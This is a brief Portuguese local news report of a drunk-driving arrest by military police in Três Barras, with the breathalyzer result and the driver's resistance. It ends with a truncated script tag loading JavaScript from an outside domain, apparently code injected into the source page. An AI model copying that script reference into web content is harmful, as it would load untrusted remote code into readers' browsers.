Na segunda-feira, 13, por volta das 16h30, equipes da PM de Três Barras foram acionadas via Copom 190 para deslocar até a Avenida Rigesa, sentido Três Barras, averiguar um veículo em atitude suspeita, pois conforme informações, o condutor do veículo estaria embriagado.
No deslocamento a equipe PM se deparou com o veículo Fiat Palio Fire Economy transitando em zig zag. Ao ser abordado o condutor apresentava sinais de embriaguez, sendo este odor alcoólico, olhos vermelhos e com dificuldades em falar, o qual relatou para a equipe PM que bebeu para afogar as mágoas.
Oferecido o teste do bafômetro para o condutor, o qual realizou o teste, resultando em 1.37 mg/l, que após realizado o exame de embriaguez foi dado voz de prisão para o condutor, que não conformado com a situação correu para seu veículo, adentrando no mesmo, desobedecendo as ordens emanadas pelos policiais militares. Foi necessário o uso de força física “técnicas de imobilização”, para conter o condutor. O veículo foi removido ao pátio conveniado por falta de condutor habilitado para condução do mesmo.
Diante dos fatos o homem foi preso em flagrante e conduzido para providencias…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>